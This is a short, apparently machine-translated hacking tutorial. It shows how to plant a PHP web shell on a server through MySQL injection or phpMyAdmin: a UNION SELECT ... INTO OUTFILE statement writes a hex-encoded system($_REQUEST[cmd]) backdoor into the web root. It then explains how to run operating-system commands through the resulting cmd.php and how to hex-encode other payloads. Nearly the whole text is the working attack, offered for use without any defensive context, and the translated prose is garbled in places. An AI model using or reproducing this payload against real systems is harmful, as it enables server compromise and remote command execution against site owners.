mysql| Trojan Horse | statement
Through the MySQL statement to generate Backdoor Trojan Method!
SELECT * from ' vbb_strikes ' WHERE 1 Union Select 2,3,0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e From Vbb_strikes into outfile ' c:/inetpub/wwwroot/cmd.php '
Through the injection of MySQL or running the above statement in the phpMyAdmin, the c:/inetpub/wwwroot/cmd.php file will be generated, the content is the original vbb_strikes content, followed by:
2 3 <?php System ($_request[cmd]);? >
And then through http://www.xxx.com/cmd.php?cmd=dir c:\ You can execute the System DOS command!
What string of 0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e is that?
is <?php system ($_request[cmd]);? > hexadecimal encoding, if not this method, there will be different versions of the SQL version of the code: such as%XX, which this backdoor can not be carried out! If you have other names to get, you can enter them in the UltraEdit, and then press the [Ctrl+h] key. It's okay to connect the hex to the inside!